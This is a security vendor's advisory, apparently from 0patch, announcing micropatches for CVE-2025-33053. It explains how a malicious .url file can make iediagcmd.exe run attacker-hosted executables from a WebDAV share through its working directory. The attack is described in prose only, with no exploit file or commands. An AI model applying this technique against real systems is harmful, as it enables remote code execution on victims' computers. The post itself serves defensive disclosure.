Micropatches Released for WEBDAV Remote Code Execution Vulnerability (CVE-2025-33053)

June 2025 Windows updates brought a fix for CVE-2025-33053, a remote code execution vulnerability that was found to be exploited in the wild. The vulnerability allows a malicious URL file pointing to a legitimate local Windows executable to "sideload" a DLL or EXE from attacker's server on the Internet when opened.

Note that while Microsoft titled this issue "WEBDAV Remote Code Execution", the vulnerability can be generally exploited using any SMB network share, including an internal network shared folder. However, since most firewalls and Internet Service Providers block SMB traffic, WebDAV makes for a much more powerful attack scenario as it allows the malicious DLL to be loaded from a server on the Internet right through the firewall.

 

The Vulnerability 

This vulnerability was detected by Alexandra Gofman and David Driker with Check Point Research, who wrote up a detailed analysis. Windows Internet shortcut files, also called URL files by their .url extension, are text-based files initially designed to be desktop shortcuts to Internet sites. As the documentation states, "When the user clicks the icon, the browser is launched and displays the site associated with the shortcut." 

In reality, URL files also allow for direct launching of executable files from a specified path, and apparently also with a specified CWD (current working directory) - which can point to a network path under attacker's control. This becomes very important when the launched executable - e.g., a legitimate Windows executable from C:\Windows\System32 folder - tries to load some DLL or launch an EXE and looks for it in the CWD according to its effective search order strategy. In effect, this then becomes a "binary planting" attack with a twist.

The attack detected by Check Point used a malicious URL file specifying a path to a legitimate local Windows executable C:\Program Files\Internet Explorer\iediagcmd.exe, and WorkingDirectory pointing to attacker's Internet-based network share.

When launched, iediagcmd.exe in turn launches other executables like ipconfig.exe and route.exe without providing full path to them. According to the CreateProcess documentation, the executable to be launched is searched for in the following locations:

1. The directory from which the application loaded.
2. The current directory for the parent process.
3. The 32-bit Windows system directory.
4. The 16-bit Windows system directory.
5. The Windows directory.
6. The directories that are listed in the PATH environment variable.

Note that the parent executable (iediagcmd.exe) resides in the C:\Program Files\Internet Explorer folder, while ipconfig.exe and route.exe reside in the C:\Windows\System32 folder. Therefore, the latter are not found in "the directory from which the application loaded," so the process tries the current working directory next.

Which is on attacker's network share. 

While this attack could easily be mounted inside the victim computer's network, the attacker would have to already be inside this network. That is where WebDAV comes in: when the Web Client service is running on the computer, remote network shares are not only accessible via the SMB protocol, but also via HTTP-based WebDAV that goes right through the company's firewall. With WebDAV, the malicious ipconfig.exe or route.exe can be hosted on an Internet web server, and they will be automatically downloaded and executed by Windows when a user in a firewalled corporate network opens the malicious URL file that seemingly only launches a trusted local executable.

 

Microsoft's Patch

Microsoft patched this issue by changing the behavior of URL files such as to ignore the WorkingDirectory value when launching executables.

 

Our Micropatch

Our patch does the exact same thing as Microsoft's.

Micropatch Availability

Micropatches were written for the following security-adopted versions of Windows with all available Windows Updates installed:

1. Windows 11 21H2 - fully updated
2. Windows 10 21H2 - fully updated
3. Windows 10 21H1 - fully updated
4. Windows 10 20H2 - fully updated
5. Windows 10 2004 - fully updated
6. Windows 10 1909 - fully updated
7. Windows 10 1809 - fully updated
8. Windows 10 v1803 - fully updated
9. Windows 7 - fully updated without ESU, with ESU 1, ESU 2 or ESU 3
10. Windows Server 2008 R2 - - fully updated without ESU, with ESU 1, ESU 2, ESU 3 or ESU 4
11. Windows Server 2012 - fully updated without ESU, with ESU 1
12. Windows Server 2012 R2 - fully updated without ESU, with ESU 1
    

 

Micropatches have already been distributed to, and applied on, all affected online computers with 0patch Agent in PRO or Enterprise accounts (unless Enterprise group settings prevented that). 

Vulnerabilities like these get discovered on a regular basis, and attackers know about them all. If you're using Windows that aren't receiving official security updates anymore, 0patch will make sure these vulnerabilities won't be exploited on your computers - and you won't even have to know or care about these things.

If you're new to 0patch, create a free account in 0patch Central, start a free trial, then install and register 0patch Agent. Everything else will happen automatically. No computer reboot will be needed.

We would like to thank security researchers Alexandra Gofman and David Driker with Check Point Research for publishing their analysis, which made it possible for us to create a micropatch for this issue.

Did you know 0patch will security-adopt Windows 10 when it goes out of support in October 2025, allowing you to keep using it for at least 5 more years? Read more about it here.

To learn more about 0patch, please visit our Help Center.